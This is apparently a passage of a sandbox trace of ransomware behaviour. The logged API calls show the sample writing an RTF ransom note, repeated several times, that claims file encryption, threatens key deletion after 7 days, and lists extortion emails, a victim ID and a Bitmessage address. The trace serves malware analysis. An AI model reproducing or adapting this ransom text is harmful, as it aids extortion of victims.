p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.653] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.653] CloseHandle (hObject=0x2c8) returned 1 [0281.653] GetFileAttributesW 